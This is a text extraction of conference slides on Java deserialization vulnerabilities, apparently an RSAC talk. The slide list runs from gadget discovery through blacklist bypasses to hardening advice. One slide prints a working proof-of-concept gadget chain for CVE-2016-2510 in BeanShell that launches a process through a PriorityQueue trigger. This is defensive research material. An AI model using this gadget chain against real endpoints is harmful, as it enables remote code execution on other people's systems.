Serial Killer Silently Pwning Your Java Endpoints

Recommendations

Info

New RCE Gadget in BeanShell (CVE-2016-2510) bsh.XThis$Handler <strong>Serial</strong>izable Invoca@onHandler Upon func@on intercep@on custom BeanShell code will be called Almost any <strong>Java</strong> code can be included in the payload In order to invoke the payload a trigger gadget is needed 12
New RCE Gadget in BeanShell (CVE-2016-2510) 1 String payload = "compare(Object foo, Object bar) {" + 2 " new java.lang.ProcessBuilder(new String[]{\"calc.exe\"}).start();return 1;" + 3 "}"; 4 5 // Create Interpreter 6 Interpreter i = new Interpreter(); 7 i.eval(payload); 8 9 // Create Proxy/InvocationHandler 10 XThis xt = new XThis(i.getNameSpace(), i); 11 InvocationHandler handler = (InvocationHandler) getField(xt.getClass(), "invocationHandler").get(xt); 12 Comparator comparator = (Comparator) Proxy.newProxyInstance(classLoader, new Class[]{Comparator.class}, handler); 13 14 // Prepare Trigger Gadget (will call Comparator.compare() during deserialization) 15 final PriorityQueue priorityQueue = new PriorityQueue(2, comparator); 16 Object[] queue = new Object[] {1,1}; 17 setFieldValue(priorityQueue, "queue", queue); 18 setFieldValue(priorityQueue, "size", 2); 13
Page 1 and 2: SESSION ID: ASD-F03 Alvaro Muñoz S
Page 3 and 4: What is Java Serializa;on again? Ta
Page 5 and 6: Standing on the Shoulder of Giants
Page 7 and 8: Triggering Execu;on via "Magic Meth
Page 9 and 10: Exploi;ng "Magic Methods" But what
Page 11: Exploi;ng Invoca;onHandler (IH) Gad
Page 15 and 16: New RCE Gadget in Jython (CVE pendi
Page 17 and 18: Demo of aMack Let’s take a look a
Page 19 and 20: Exis;ng Mi;ga;on Advice Simply remo
Page 21 and 22: Exis;ng Mi;ga;on Advice Simply remo
Page 23 and 24: Bypassing LookAhead Blacklists New
Page 25 and 26: Example (has been fixed) org.apache
Page 27 and 28: Demo of bypass Let’s take a look
Page 29 and 30: Exploi;ng JNA 1 2 calc.exe 3 4 ja
Page 31 and 32: #RSAC Finding Vulnerabili;es & Gadg
Page 33 and 34: Finding Direct Deserializa;on Endpo
Page 35 and 36: Finding Gadgets for Fun & Profit Si
Page 37 and 38: Passive Deserializa;on Endpoint Det
Page 39 and 40: Hardening Advice #RSAC
Page 41 and 42: Apply What You Have Learned Today N

Serial Killer Silently Pwning Your Java Endpoints

Create successful ePaper yourself

Delete template?

Save as template?